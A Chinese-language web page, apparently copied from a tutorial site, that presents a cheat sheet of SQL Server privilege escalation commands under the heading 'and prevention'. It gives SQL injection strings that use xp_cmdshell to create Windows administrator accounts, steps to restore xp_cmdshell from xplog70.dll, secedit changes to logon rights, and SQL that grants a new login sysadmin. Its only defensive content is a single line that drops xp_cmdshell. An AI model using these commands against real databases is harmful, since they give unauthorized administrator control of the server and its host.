SQL Server提升权限相关命令及防范

那些WS

那些WS

2016-01-29 16:49

SQL Server提升权限相关命令及防范,SQL Server提升权限相关命令及防范

;exec master..xp_cmdshell "net user name password /add"--
;exec master..xp_cmdshell "net localgroup administrators name /add"--

程序代码开启cmdshell的SQL语句

(本文来源于图老师网站,更多请访问https://m.tulaoshi.com/sqlserver/)

EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK

恢复xp_cmdshell
Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK

(本文来源于图老师网站,更多请访问https://m.tulaoshi.com/sqlserver/)

否则上传xplog7.0.dll
Exec master.dbo.addextendedproc 'xp_cmdshell','C:/WinNt/System32/xplog70.dll'

堵上cmdshell的SQL语句
sp_dropextendedproc "xp_cmdshell"


DOS:
dir c:/
dir d:/
dir e:/

net user TsInternetUsers Password /add
net localGroup Administrators TsInternetUsers /add

备份恢复IPSEC

secedit /export /CFG c:/tmp.inf
echo sedenynetworklogonright =c:/tmp.inf
secedit /configure /db c:/windows/secedit.sdb /CFG c:/tmp.inf

SQL:
exec master..sp_addlogin UserName,Password
exec master..sp_addsrvrolemember UserName,sysadmin

展开更多 50%)
分享

猜你喜欢

SQL Server提升权限相关命令及防范

SQLServer
SQL Server提升权限相关命令及防范

SQL Server的用户及权限

SQLServer
SQL Server的用户及权限

s8lol主宰符文怎么配

英雄联盟 网络游戏
s8lol主宰符文怎么配

精华推荐:SQL Server的用户及权限

SQLServer
精华推荐:SQL Server的用户及权限

Microsoft SQL Server 7.0 备份及恢复相关问题

SQLServer
Microsoft SQL Server 7.0 备份及恢复相关问题

lol偷钱流符文搭配推荐

英雄联盟 网络游戏
lol偷钱流符文搭配推荐

重启IIS和SQL Server命令

编程语言 网络编程
重启IIS和SQL Server命令

SQL Server常用管理命令小结

编程语言 网络编程
SQL Server常用管理命令小结

lolAD刺客新符文搭配推荐

英雄联盟
lolAD刺客新符文搭配推荐

《地牢猎手4》bug制作材料装备攻略

《地牢猎手4》bug制作材料装备攻略

《混沌与秩序》新手游戏心得

《混沌与秩序》新手游戏心得
下拉加载更多内容 ↓